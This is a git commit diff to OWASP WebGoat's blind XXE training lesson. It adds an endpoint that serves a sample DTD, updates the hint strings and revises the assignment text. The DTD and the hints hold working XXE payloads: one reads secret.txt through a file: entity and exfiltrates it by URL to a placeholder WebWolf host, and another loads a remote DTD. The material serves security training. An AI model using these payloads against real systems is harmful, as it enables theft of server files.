xxe path info (#670)
* xxe path info aid added * xxe path info aid added * changes to template file and hints * added ssl test support for XXE * added ssl test support for XXE * restconfig replaced by httpsrelaxed * processed review comments on hints and example
This commit is contained in:
René Zubcevic
GitHub
@ -29,14 +29,17 @@ import org.owasp.webgoat.assignments.AssignmentHints;
|
||||
import org.owasp.webgoat.assignments.AttackResult;
|
||||
import org.springframework.beans.factory.annotation.Autowired;
|
||||
import org.springframework.beans.factory.annotation.Value;
|
||||
import org.springframework.http.MediaType;
|
||||
import org.springframework.web.bind.annotation.PostMapping;
|
||||
import org.springframework.web.bind.annotation.RequestBody;
|
||||
import org.springframework.web.bind.annotation.RequestMapping;
|
||||
import org.springframework.web.bind.annotation.ResponseBody;
|
||||
import org.springframework.web.bind.annotation.RestController;
|
||||
|
||||
import static org.springframework.http.MediaType.ALL_VALUE;
|
||||
import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
|
||||
|
||||
|
||||
/**
|
||||
* @author nbaars
|
||||
* @since 4/8/17.
|
||||
@ -50,6 +53,11 @@ public class SimpleXXE extends AssignmentEndpoint {
|
||||
|
||||
@Value("${webgoat.server.directory}")
|
||||
private String webGoatHomeDirectory;
|
||||
|
||||
@Value("${webwolf.url.landingpage}")
|
||||
private String webWolfURL;
|
||||
|
||||
|
||||
@Autowired
|
||||
private Comments comments;
|
||||
|
||||
@ -77,4 +85,20 @@ public class SimpleXXE extends AssignmentEndpoint {
|
||||
}
|
||||
return success;
|
||||
}
|
||||
|
||||
@RequestMapping(path="/xxe/tmpdir",consumes = ALL_VALUE, produces=MediaType.TEXT_PLAIN_VALUE)
|
||||
@ResponseBody
|
||||
public String getWebGoatHomeDirectory() {
|
||||
return webGoatHomeDirectory;
|
||||
}
|
||||
|
||||
@RequestMapping(path="/xxe/sampledtd",consumes = ALL_VALUE, produces=MediaType.TEXT_PLAIN_VALUE)
|
||||
@ResponseBody
|
||||
public String getSampleDTDFile() {
|
||||
return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
|
||||
"<!ENTITY % file SYSTEM \"file:replace-this-by-webgoat-temp-directory/XXE/secret.txt\">\n" +
|
||||
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>\">\n" +
|
||||
"%all;";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
@ -42,5 +42,5 @@ xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
|
||||
xxe.blind.hints.1=This assignment is more complicated you need to upload the contents of a file to the attackers site (WebWolf in this case)
|
||||
xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities.
|
||||
xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
|
||||
xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment
|
||||
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "http://localhost:9090/files/test1234/test.dtd">%remote;]><comment><text>test&send;</text></comment>
|
||||
xxe.blind.hints.4=An example DTD can be found [[webgoat base url]]/WebGoat/xxe/sampledtd, include this DTD in the xml comment
|
||||
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "[[webwolf base url]]/files/[[user]]/test.dtd">%remote;]><comment><text>test&send;</text></comment>
|
||||
|
||||
@ -1,21 +1,16 @@
|
||||
== Blind XXE assignment
|
||||
|
||||
In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD
|
||||
which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server. You can use WebWolf to serve your
|
||||
DTD.
|
||||
which will upload the contents of a file secret.txt from the WebGoat server to our WebWolf server. You can use WebWolf to serve your DTD.
|
||||
The secret.txt is located on the WebGoat server in this location, so you do not need to scan all directories and files:
|
||||
|
||||
|
||||
|===
|
||||
|OS |Location
|
||||
|
||||
|Linux
|
||||
|`/home/USER/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|
||||
|`operatingSystem:os[]`
|
||||
|`webGoatTempDir:temppath[]/XXE/secret.txt`
|
||||
|
||||
|Windows
|
||||
|`c:/Users/USER/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|
||||
|
||||
|Docker
|
||||
|`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|
||||
|===
|
||||
|
||||
Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]`
|
||||
|
||||
Reference in New Issue
Block a user